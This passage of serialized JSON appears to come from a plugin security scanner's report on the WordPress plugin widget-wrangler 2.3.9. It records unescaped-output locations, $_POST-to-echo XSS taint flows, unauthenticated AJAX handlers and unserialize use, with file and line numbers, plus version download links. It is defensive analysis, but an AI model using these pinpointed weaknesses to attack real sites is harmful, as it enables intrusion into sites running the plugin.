unserialize($extra->widgets);",{"prepared":61,"raw":91,"locations":286},[],{"escaped":288,"rawEcho":289,"locations":290},75,189,[291,294,296,298,300,302,304,306,309,310,312,313,314,315,317,319,321,322,324,326,329,331,332,333,335,336,338,340,343,345,346,347,349,351,353,355,357,359,362,364,366,368,371,373,374,375,377,378,380,382,384,386,388,390,392,394,396,399,401,403,405,407,409,411,413,415,417,419,421,423,425,427,429,431,433,435,437,439,441,443,445,447,449,451,453,455,457,459,461,463,465,467,468,470,472,474,476,477,479,480,482,483,484,486,487,489,491,493,495,497,499,501,502,504,506,508,509,510,511,513,515,516,517,519,521,523,525,527,529,531,533,535,537,539,541,543,545,547,549,551,553,555,556,558,560,562,563,565,567,569,571,573,575,577,579,581,583,585,588,589,590,591,592,593,595,596,599,600,601,602,604,605,606,607,608,611,613,615,618,619,620,622,623,624,625,627,628,630,631],{"file":189,"line":292,"context":293},207,"raw output",{"file":189,"line":295,"context":293},239,{"file":189,"line":297,"context":293},240,{"file":189,"line":299,"context":293},243,{"file":189,"line":301,"context":293},264,{"file":189,"line":303,"context":293},265,{"file":189,"line":305,"context":293},291,{"file":307,"line":308,"context":293},"admin\\AdminPageClones.php",83,{"file":307,"line":194,"context":293},{"file":311,"line":190,"context":293},"admin\\AdminPageCorrals.php",{"file":311,"line":190,"context":293},{"file":311,"line":194,"context":293},{"file":311,"line":194,"context":293},{"file":311,"line":316,"context":293},269,{"file":311,"line":318,"context":293},277,{"file":311,"line":320,"context":293},294,{"file":311,"line":320,"context":293},{"file":311,"line":323,"context":293},297,{"file":311,"line":325,"context":293},298,{"file":327,"line":328,"context":293},"admin\\AdminPageDocumentation.php",38,{"file":327,"line":330,"context":293},56,{"file":327,"line":221,"context":293},{"file":327,"line":27,"context":293},{"file":327,"line":334,"context":293},134,{"file":327,"line":334,"context":293},{"file":327,"line":337,"context":293},208,{"file":327,"line":339,"context":293},373,{"file":341,"line":342,"context":293},"admin\\AdminPagePresets.php",322,{"file":341,"line":344,"context":293},323,{"file":341,"line":344,"context":293},{"file":341,"line":344,"context":293},{"file":341,"line":348,"context":293},330,{"file":341,"line":350,"context":293},336,{"file":341,"line":352,"context":293},340,{"file":341,"line":354,"context":293},343,{"file":341,"line":356,"context":293},344,{"file":341,"line":358,"context":293},376,{"file":360,"line":361,"context":293},"admin\\AdminPageSettings.php",183,{"file":360,"line":363,"context":293},193,{"file":360,"line":365,"context":293},194,{"file":360,"line":367,"context":293},195,{"file":369,"line":370,"context":293},"admin\\AdminPageSidebars.php",97,{"file":369,"line":372,"context":293},99,{"file":369,"line":243,"context":293},{"file":369,"line":243,"context":293},{"file":369,"line":376,"context":293},113,{"file":369,"line":246,"context":293},{"file":369,"line":379,"context":293},122,{"file":369,"line":381,"context":293},124,{"file":369,"line":383,"context":293},131,{"file":369,"line":385,"context":293},139,{"file":369,"line":387,"context":293},147,{"file":369,"line":389,"context":293},155,{"file":369,"line":391,"context":293},164,{"file":369,"line":393,"context":293},169,{"file":369,"line":395,"context":293},176,{"file":397,"line":398,"context":293},"admin\\Form.php",440,{"file":397,"line":400,"context":293},455,{"file":397,"line":402,"context":293},504,{"file":397,"line":404,"context":293},507,{"file":397,"line":406,"context":293},511,{"file":397,"line":408,"context":293},513,{"file":397,"line":410,"context":293},516,{"file":397,"line":412,"context":293},535,{"file":397,"line":414,"context":293},552,{"file":397,"line":416,"context":293},555,{"file":397,"line":418,"context":293},569,{"file":397,"line":420,"context":293},589,{"file":397,"line":422,"context":293},594,{"file":397,"line":424,"context":293},597,{"file":397,"line":426,"context":293},601,{"file":397,"line":428,"context":293},639,{"file":397,"line":430,"context":293},644,{"file":397,"line":432,"context":293},647,{"file":397,"line":434,"context":293},651,{"file":397,"line":436,"context":293},656,{"file":397,"line":438,"context":293},675,{"file":397,"line":440,"context":293},680,{"file":397,"line":442,"context":293},683,{"file":397,"line":444,"context":293},687,{"file":397,"line":446,"context":293},692,{"file":397,"line":448,"context":293},711,{"file":397,"line":450,"context":293},717,{"file":397,"line":452,"context":293},720,{"file":397,"line":454,"context":293},724,{"file":397,"line":456,"context":293},729,{"file":198,"line":458,"context":293},57,{"file":198,"line":460,"context":293},86,{"file":198,"line":462,"context":293},114,{"file":198,"line":464,"context":293},119,{"file":198,"line":466,"context":293},128,{"file":198,"line":334,"context":293},{"file":198,"line":469,"context":293},154,{"file":198,"line":471,"context":293},177,{"file":198,"line":473,"context":293},257,{"file":198,"line":475,"context":293},258,{"file":198,"line":475,"context":293},{"file":198,"line":478,"context":293},261,{"file":198,"line":301,"context":293},{"file":198,"line":481,"context":293},293,{"file":198,"line":320,"context":293},{"file":198,"line":320,"context":293},{"file":198,"line":485,"context":293},295,{"file":198,"line":485,"context":293},{"file":198,"line":488,"context":293},296,{"file":198,"line":490,"context":293},299,{"file":198,"line":492,"context":293},300,{"file":198,"line":494,"context":293},302,{"file":198,"line":496,"context":293},306,{"file":206,"line":498,"context":293},102,{"file":206,"line":500,"context":293},138,{"file":210,"line":500,"context":293},{"file":210,"line":503,"context":293},151,{"file":210,"line":505,"context":293},275,{"file":210,"line":507,"context":293},276,{"file":210,"line":318,"context":293},{"file":210,"line":481,"context":293},{"file":210,"line":490,"context":293},{"file":210,"line":512,"context":293},305,{"file":210,"line":514,"context":293},324,{"file":210,"line":348,"context":293},{"file":210,"line":350,"context":293},{"file":210,"line":518,"context":293},353,{"file":210,"line":520,"context":293},354,{"file":210,"line":522,"context":293},355,{"file":210,"line":524,"context":293},356,{"file":210,"line":526,"context":293},357,{"file":210,"line":528,"context":293},378,{"file":210,"line":530,"context":293},384,{"file":210,"line":532,"context":293},401,{"file":210,"line":534,"context":293},403,{"file":210,"line":536,"context":293},430,{"file":210,"line":538,"context":293},437,{"file":210,"line":540,"context":293},444,{"file":210,"line":542,"context":293},450,{"file":210,"line":544,"context":293},457,{"file":210,"line":546,"context":293},464,{"file":210,"line":548,"context":293},486,{"file":210,"line":550,"context":293},487,{"file":210,"line":552,"context":293},494,{"file":210,"line":554,"context":293},501,{"file":210,"line":404,"context":293},{"file":210,"line":557,"context":293},514,{"file":210,"line":559,"context":293},521,{"file":210,"line":561,"context":293},528,{"file":210,"line":412,"context":293},{"file":210,"line":564,"context":293},542,{"file":210,"line":566,"context":293},612,{"file":210,"line":568,"context":293},633,{"file":210,"line":570,"context":293},638,{"file":210,"line":572,"context":293},645,{"file":210,"line":574,"context":293},668,{"file":210,"line":576,"context":293},678,{"file":210,"line":578,"context":293},728,{"file":210,"line":580,"context":293},735,{"file":210,"line":582,"context":293},747,{"file":225,"line":584,"context":293},234,{"file":586,"line":587,"context":293},"includes\\wp-widget-ww-corral.php",79,{"file":586,"line":587,"context":293},{"file":586,"line":587,"context":293},{"file":586,"line":308,"context":293},{"file":586,"line":102,"context":293},{"file":586,"line":102,"context":293},{"file":586,"line":594,"context":293},89,{"file":586,"line":594,"context":293},{"file":597,"line":598,"context":293},"includes\\wp-widget-ww-widget.php",44,{"file":597,"line":236,"context":293},{"file":597,"line":236,"context":293},{"file":597,"line":236,"context":293},{"file":597,"line":603,"context":293},82,{"file":597,"line":308,"context":293},{"file":597,"line":308,"context":293},{"file":597,"line":90,"context":293},{"file":597,"line":90,"context":293},{"file":609,"line":610,"context":293},"templates\\widget-1x.php",20,{"file":609,"line":612,"context":293},22,{"file":609,"line":614,"context":293},26,{"file":616,"line":617,"context":293},"templates\\widget.php",21,{"file":616,"line":617,"context":293},{"file":616,"line":617,"context":293},{"file":616,"line":621,"context":293},23,{"file":616,"line":621,"context":293},{"file":616,"line":79,"context":293},{"file":616,"line":204,"context":293},{"file":616,"line":626,"context":293},28,{"file":616,"line":626,"context":293},{"file":616,"line":629,"context":293},29,{"file":616,"line":118,"context":293},{"file":616,"line":632,"context":293},32,[634],{"name":635,"version":38,"knownCves":636},"TinyMCE",[],[638,667,675],{"entryPoint":639,"graph":640,"unsanitizedCount":50,"severity":666},"\u003CAdminPagePresets> (admin\\AdminPagePresets.php:0)",{"nodes":641,"edges":662},[642,647,652,656,660],{"id":643,"type":644,"label":645,"file":341,"line":646},"n0","source","$_POST (x2)",223,{"id":648,"type":649,"label":650,"file":341,"line":354,"wp_function":651},"n1","sink","echo() [XSS]","echo",{"id":653,"type":644,"label":654,"file":341,"line":655},"n2","$_POST",371,{"id":657,"type":658,"label":659,"file":341,"line":655},"n3","transform","→ form()",{"id":661,"type":649,"label":650,"file":597,"line":236,"wp_function":651},"n4",[663,664,665],{"from":643,"to":648,"sanitized":49},{"from":653,"to":657,"sanitized":49},{"from":657,"to":661,"sanitized":49},"medium",{"entryPoint":668,"graph":669,"unsanitizedCount":28,"severity":666},"preview_ajax (admin\\WidgetPostType.php:687)",{"nodes":670,"edges":673},[671,672],{"id":643,"type":644,"label":654,"file":210,"line":446},{"id":648,"type":649,"label":650,"file":210,"line":578,"wp_function":651},[674],{"from":643,"to":648,"sanitized":49},{"entryPoint":676,"graph":677,"unsanitizedCount":28,"severity":683},"\u003CWidgetPostType> (admin\\WidgetPostType.php:0)",{"nodes":678,"edges":681},[679,680],{"id":643,"type":644,"label":654,"file":210,"line":446},{"id":648,"type":649,"label":650,"file":210,"line":578,"wp_function":651},[682],{"from":643,"to":648,"sanitized":49},"low",{"summary":685,"deductions":686},"The \"widget-wrangler\" plugin v2.3.9 exhibits a mixed security posture. On the positive side, it demonstrates strong practices regarding SQL queries, utilizing prepared statements exclusively, and has no recorded vulnerability history, suggesting a generally well-maintained codebase.  However, significant concerns arise from the static analysis. The presence of two AJAX handlers without authentication checks represents a direct attack vector that could be exploited by unauthenticated users. Furthermore, the use of the `unserialize` function is a known risk, as it can lead to remote code execution if unsanitized data is processed. The taint analysis, while not revealing critical or high severity issues, did identify flows with unsanitized paths, which, when combined with the `unserialize` function, warrants careful attention.\n\nThe lack of any recorded CVEs is a strong indicator of past security diligence. However, this does not negate the current risks identified in the static analysis. The plugin's strengths lie in its secure database interactions and its vulnerability-free history. Its weaknesses are primarily in its handling of user-supplied data for AJAX endpoints and the potentially dangerous `unserialize` function.  A balanced conclusion is that while the plugin appears to be robust in some areas, the identified attack surface and function usage create exploitable weaknesses that require remediation.",[687,689,692,695,697,699],{"reason":688,"points":135},"AJAX handlers without auth checks",{"reason":690,"points":691},"Use of unserialize function",8,{"reason":693,"points":694},"Flows with unsanitized paths",6,{"reason":696,"points":61},"Insufficient nonce checks",{"reason":698,"points":61},"Insufficient capability checks",{"reason":700,"points":276},"Low percentage of properly escaped output","2026-03-16T20:22:00.185Z",{"wat":703,"direct":740},{"assetPaths":704,"generatorPatterns":721,"scriptPaths":722,"versionParams":723},[705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720],"\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fcss\u002Fbootstrap-multiselect.css","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fcss\u002Fbootstrap-toggle.css","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fcss\u002Fjquery-ui-1.10.3.custom.min.css","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fcss\u002Fstyles.css","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap-multiselect.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap-toggle.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap.min.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.cookie.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.nEnter.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.validate.min.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fsidebar-editor.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Ftinymce-editor-button.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fwidget-wrangler-admin.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fwidget-wrangler-settings.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Fjs\u002Fwidgets.js","\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fincludes\u002Fjs\u002Fjquery-ui-1.10.3.custom.min.js",[],[709,710,711,712,713,714,715,716,717,718,719,720],[724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739],"widget-wrangler\u002Fadmin\u002Fcss\u002Fbootstrap-multiselect.css?ver=","widget-wrangler\u002Fadmin\u002Fcss\u002Fbootstrap-toggle.css?ver=","widget-wrangler\u002Fadmin\u002Fcss\u002Fjquery-ui-1.10.3.custom.min.css?ver=","widget-wrangler\u002Fadmin\u002Fcss\u002Fstyles.css?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap-multiselect.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap-toggle.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fbootstrap.min.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.cookie.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.nEnter.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fjquery.validate.min.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fsidebar-editor.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Ftinymce-editor-button.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fwidget-wrangler-admin.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fwidget-wrangler-settings.js?ver=","widget-wrangler\u002Fadmin\u002Fjs\u002Fwidgets.js?ver=","widget-wrangler\u002Fincludes\u002Fjs\u002Fjquery-ui-1.10.3.custom.min.js?ver=",{"cssClasses":741,"htmlComments":747,"htmlAttributes":774,"restEndpoints":778,"jsGlobals":781,"shortcodeOutput":787},[742,743,744,745,746],"widget-wrangler-settings-section","widget-wrangler-widget-form-field","ww-widget-display","ww-corral-widget","widget-wrangler-admin-bar",[748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773],"Copyright 2010  Jonathan Daggerhart","This program is free software","This program is distributed in the hope that it will be useful","You should have received a copy of the GNU General Public License","Store an instance of the Display object for global functions.","Store a copy of the contextual page widgets here for other plugins","Backwards compatibility for WW 2.2-","Construct the widget wrangler object.","- add dependencies","Instantiate and register WP hooks","WordPress hook widgets_init","- Register the corral and widget WP_Widget(s)","WordPress hook plugins_loaded","initialize admin stuff","make sure we're updated","WordPress wp_loaded hook","Widget Post Type","Keep a copy of the page widgets here within the global WW object for","other plugins or themes to use.","Returns all published widgets","Retrieve and return a single widget by its ID","Hook for this specific page.","Widget Wrangler settings values array.","Parent relative url for this page.","Capability required to access this page.","This page's title.",[775,776,777],"data-ww-widget-id","data-ww-corral-id","data-widget-wrangler-nonce",[779,780],"\u002Fwp-json\u002Fwidget-wrangler\u002Fv1\u002Fwidgets","\u002Fwp-json\u002Fwidget-wrangler\u002Fv1\u002Fwidget\u002F",[782,783,784,785,786],"WidgetWrangler","ww_admin_params","ww_settings_params","ww_tinymce_params","ww_sidebar_editor_params",[788,789],"[widget-wrangler-corral id=\"\"","[widget-wrangler-widget id=\"\"",{"error":791,"url":792,"statusCode":793,"statusMessage":794,"message":794},true,"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fwidget-wrangler\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":621,"versions":796},[797,804,812,820,828,836,844,852,860,868,876,884,892,900,908,916,924,932,940,948,956,964,972],{"version":6,"download_url":798,"svn_tag_url":799,"released_at":38,"has_diff":49,"diff_files_changed":800,"diff_lines":38,"trac_diff_url":801,"vulnerabilities":802,"is_current":791},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.8&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.9",[803],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":805,"download_url":806,"svn_tag_url":807,"released_at":38,"has_diff":49,"diff_files_changed":808,"diff_lines":38,"trac_diff_url":809,"vulnerabilities":810,"is_current":49},"2.3.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.7&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.8",[811],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":813,"download_url":814,"svn_tag_url":815,"released_at":38,"has_diff":49,"diff_files_changed":816,"diff_lines":38,"trac_diff_url":817,"vulnerabilities":818,"is_current":49},"2.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.6&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.7",[819],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":821,"download_url":822,"svn_tag_url":823,"released_at":38,"has_diff":49,"diff_files_changed":824,"diff_lines":38,"trac_diff_url":825,"vulnerabilities":826,"is_current":49},"2.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.5&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.6",[827],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":829,"download_url":830,"svn_tag_url":831,"released_at":38,"has_diff":49,"diff_files_changed":832,"diff_lines":38,"trac_diff_url":833,"vulnerabilities":834,"is_current":49},"2.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.4&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.5",[835],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":837,"download_url":838,"svn_tag_url":839,"released_at":38,"has_diff":49,"diff_files_changed":840,"diff_lines":38,"trac_diff_url":841,"vulnerabilities":842,"is_current":49},"2.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.3.3&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.4",[843],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":845,"download_url":846,"svn_tag_url":847,"released_at":38,"has_diff":49,"diff_files_changed":848,"diff_lines":38,"trac_diff_url":849,"vulnerabilities":850,"is_current":49},"2.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.3.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.3.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.2.4&new_path=%2Fwidget-wrangler%2Ftags%2F2.3.3",[851],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":853,"download_url":854,"svn_tag_url":855,"released_at":38,"has_diff":49,"diff_files_changed":856,"diff_lines":38,"trac_diff_url":857,"vulnerabilities":858,"is_current":49},"2.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.2.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.2.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.2.3&new_path=%2Fwidget-wrangler%2Ftags%2F2.2.4",[859],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":861,"download_url":862,"svn_tag_url":863,"released_at":38,"has_diff":49,"diff_files_changed":864,"diff_lines":38,"trac_diff_url":865,"vulnerabilities":866,"is_current":49},"2.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.2.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.2.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.2.2&new_path=%2Fwidget-wrangler%2Ftags%2F2.2.3",[867],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":869,"download_url":870,"svn_tag_url":871,"released_at":38,"has_diff":49,"diff_files_changed":872,"diff_lines":38,"trac_diff_url":873,"vulnerabilities":874,"is_current":49},"2.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.2.1&new_path=%2Fwidget-wrangler%2Ftags%2F2.2.2",[875],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":877,"download_url":878,"svn_tag_url":879,"released_at":38,"has_diff":49,"diff_files_changed":880,"diff_lines":38,"trac_diff_url":881,"vulnerabilities":882,"is_current":49},"2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.2.0&new_path=%2Fwidget-wrangler%2Ftags%2F2.2.1",[883],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":885,"download_url":886,"svn_tag_url":887,"released_at":38,"has_diff":49,"diff_files_changed":888,"diff_lines":38,"trac_diff_url":889,"vulnerabilities":890,"is_current":49},"2.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.1.6&new_path=%2Fwidget-wrangler%2Ftags%2F2.2.0",[891],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":893,"download_url":894,"svn_tag_url":895,"released_at":38,"has_diff":49,"diff_files_changed":896,"diff_lines":38,"trac_diff_url":897,"vulnerabilities":898,"is_current":49},"2.1.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.1.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.1.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.1.5&new_path=%2Fwidget-wrangler%2Ftags%2F2.1.6",[899],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":901,"download_url":902,"svn_tag_url":903,"released_at":38,"has_diff":49,"diff_files_changed":904,"diff_lines":38,"trac_diff_url":905,"vulnerabilities":906,"is_current":49},"2.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.1.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.1.4&new_path=%2Fwidget-wrangler%2Ftags%2F2.1.5",[907],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":909,"download_url":910,"svn_tag_url":911,"released_at":38,"has_diff":49,"diff_files_changed":912,"diff_lines":38,"trac_diff_url":913,"vulnerabilities":914,"is_current":49},"2.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.1.3&new_path=%2Fwidget-wrangler%2Ftags%2F2.1.4",[915],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":917,"download_url":918,"svn_tag_url":919,"released_at":38,"has_diff":49,"diff_files_changed":920,"diff_lines":38,"trac_diff_url":921,"vulnerabilities":922,"is_current":49},"2.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.0.4&new_path=%2Fwidget-wrangler%2Ftags%2F2.1.3",[923],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":925,"download_url":926,"svn_tag_url":927,"released_at":38,"has_diff":49,"diff_files_changed":928,"diff_lines":38,"trac_diff_url":929,"vulnerabilities":930,"is_current":49},"2.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.0.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.0.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F2.0.3&new_path=%2Fwidget-wrangler%2Ftags%2F2.0.4",[931],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":933,"download_url":934,"svn_tag_url":935,"released_at":38,"has_diff":49,"diff_files_changed":936,"diff_lines":38,"trac_diff_url":937,"vulnerabilities":938,"is_current":49},"2.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.2.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F2.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F1.5.4&new_path=%2Fwidget-wrangler%2Ftags%2F2.0.3",[939],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":941,"download_url":942,"svn_tag_url":943,"released_at":38,"has_diff":49,"diff_files_changed":944,"diff_lines":38,"trac_diff_url":945,"vulnerabilities":946,"is_current":49},"1.5.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.1.5.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F1.5.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F1.5.2&new_path=%2Fwidget-wrangler%2Ftags%2F1.5.4",[947],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":949,"download_url":950,"svn_tag_url":951,"released_at":38,"has_diff":49,"diff_files_changed":952,"diff_lines":38,"trac_diff_url":953,"vulnerabilities"